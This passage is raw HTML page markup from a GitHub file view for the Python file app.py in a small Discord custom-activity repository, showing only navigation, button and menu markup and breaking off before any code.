data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;STAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="6091699887b522ca30716b30e93c3c8d1789a533a28ac89051279995fc6c1426" data-ga-click="Repository, click star button, action:blob#show; text:Star"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path> </svg> <span data-view-component="true"> Star </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> </div> </li> <li> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="btn-with-count" action="/agambajwa/discord-custom-activity/fork" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="LG1tFKmIMavvvvfRBm0nTg7LfURRXhS1QlnyAmllPMXfqoHfrOevppdpK/WxXJQNgPSh+giRgFOOJpHKp2CARw==" /> <button class="btn btn-sm btn-with-count" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FORK_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="2ba6ea3d9c8e61dc4d6567d82e92d7c83e88483a640612fef5c5ac71c19d1eef" data-ga-click="Repository, show fork modal, action:blob#show; text:Fork" type="submit" title="Fork your own copy of agambajwa/discord-custom-activity to your account" aria-label="Fork your own copy of agambajwa/discord-custom-activity to your account"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path> </svg> Fork </button></form> <a href="/agambajwa/discord-custom-activity/network/members" class="social-count" aria-label="0 users forked this repository"> 0 </a> </li> </ul> </div> <div id="responsive-meta-container" data-pjax-replace> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/agambajwa/discord-custom-activity" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" data-hotkey="g c" data-ga-click="Repository, Navigation click, Code tab" data-pjax="#repo-content-pjax-container" aria-current="page" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item selected"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-content="Code">Code</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/agambajwa/discord-custom-activity/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" data-hotkey="g i" data-ga-click="Repository, Navigation click, Issues tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path> </svg> <span data-content="Issues">Issues</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/agambajwa/discord-custom-activity/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" data-hotkey="g p" data-ga-click="Repository, Navigation click, Pull requests tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path> </svg> <span data-content="Pull requests">Pull requests</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/agambajwa/discord-custom-activity/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" data-hotkey="g a" data-ga-click="Repository, Navigation click, Actions tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path> </svg> <span data-content="Actions">Actions</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/agambajwa/discord-custom-activity/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" data-hotkey="g b" data-ga-click="Repository, Navigation click, Projects tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <span data-content="Projects">Projects</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="wiki-tab" href="/agambajwa/discord-custom-activity/wiki" data-tab-item="i5wiki-tab" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" data-hotkey="g w" data-ga-click="Repository, Navigation click, Wikis tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path> </svg> <span data-content="Wiki">Wiki</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/agambajwa/discord-custom-activity/security" data-tab-item="i6security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" data-hotkey="g s" data-ga-click="Repository, Navigation click, Security tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path> </svg> <span data-content="Security">Security</span> <include-fragment src="/agambajwa/discord-custom-activity/security/overall-count" accept="text/fragment+html"></include-fragment> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/agambajwa/discord-custom-activity/pulse" data-tab-item="i7insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" data-ga-click="Repository, Navigation click, Insights tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path> </svg> <span data-content="Insights">Insights</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> <span class="sr-only">More</span> </div> </summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> <ul> <li data-menu-item="i0code-tab" hidden> <a role="menuitem" class="js-selected-navigation-item selected dropdown-item" aria-current="page" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" href="/agambajwa/discord-custom-activity"> Code </a> </li> <li data-menu-item="i1issues-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" href="/agambajwa/discord-custom-activity/issues"> Issues </a> </li> <li data-menu-item="i2pull-requests-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" href="/agambajwa/discord-custom-activity/pulls"> Pull requests </a> </li> <li data-menu-item="i3actions-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" href="/agambajwa/discord-custom-activity/actions"> Actions </a> </li> <li data-menu-item="i4projects-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" href="/agambajwa/discord-custom-activity/projects"> Projects </a> </li> <li data-menu-item="i5wiki-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" href="/agambajwa/discord-custom-activity/wiki"> Wiki </a> </li> <li data-menu-item="i6security-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" href="/agambajwa/discord-custom-activity/security"> Security </a> </li> <li data-menu-item="i7insights-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" href="/agambajwa/discord-custom-activity/pulse"> Insights </a> </li> </ul> </details-menu></div> </details></div> </nav> </div> <div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " > <a href="https://github.dev/" class="d-none js-github-dev-shortcut" data-hotkey=".,E,c o d e">Open in github.dev</a> <div> <a class="d-none js-permalink-shortcut" data-hotkey="y" href="/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">Permalink</a> <!-- blob contrib key: blob_contributors:v22:13522820112eb6c6400625101636e4def06f02593a899cf92e79c023ce6ed737 --> <div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path> </svg> <span class="css-truncate-target" data-menu-button>master</span> <span class="dropdown-caret"></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div> </template> <!-- TODO: this max-height is necessary or else the branch list won't scroll. why? --> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax=" <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/branches">View all branches</a></footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector tab-selected:ref-selector focus-list:ref-selector " data-targets="input-demux.sinks" query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax=" <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/tags">View all tags</a></footer> </ref-selector> </div> </tab-container> </input-demux> </div> </div> </details> </div> <h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span class="js-repo-root text-bold"><span class="js-path-segment d-inline-block wb-break-all"><a data-pjax=" <span class="separator">/</span><details class="details-reset details-overlay d-inline" id="jumpto-symbol-select-menu"> <summary aria-haspopup="true" data-hotkey="r" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_blob_definitions&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_blob_definitions&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="8ab7943d9e2ebd68838936d01c014cb5492553c6b3f67f3ecef74fb8344b8b58" role="button" data-view-component="true" class="Link--secondary css-truncate btn-link"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-menu-button>Jump to</span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu SelectMenu--hasFilter" role="menu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Code definitions</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="jumpto-symbol-select-menu"> <svg aria-label="Close menu" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-filter"> <input class="SelectMenu-input form-control js-filterable-field" id="jumpto-symbols-filter-field" type="text" autocomplete="off" spellcheck="false" autofocus placeholder="Filter definitions" aria-label="Filter definitions"> </div> <div class="SelectMenu-list"> <div data-filterable-for="jumpto-symbols-filter-field" data-filterable-type="substring"> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>main</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>set_activity</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> </div> </div> <footer class="SelectMenu-footer"> <div class="d-flex flex-justify-between"> Code navigation index up-to-date <svg class="octicon octicon-dot-fill text-green" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M8 4a4 4 0 100 8 4 4 0 000-8z"></path></svg> </div> </footer> </div> </details-menu> </details> </h2> <a href="/agambajwa/discord-custom-activity/find/master" class="js-pjax-capture-input btn mr-2 d-none d-md-block" data-pjax data-hotkey="t"> Go to file </a> <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <div data-view-component="true"> <ul class="dropdown-menu 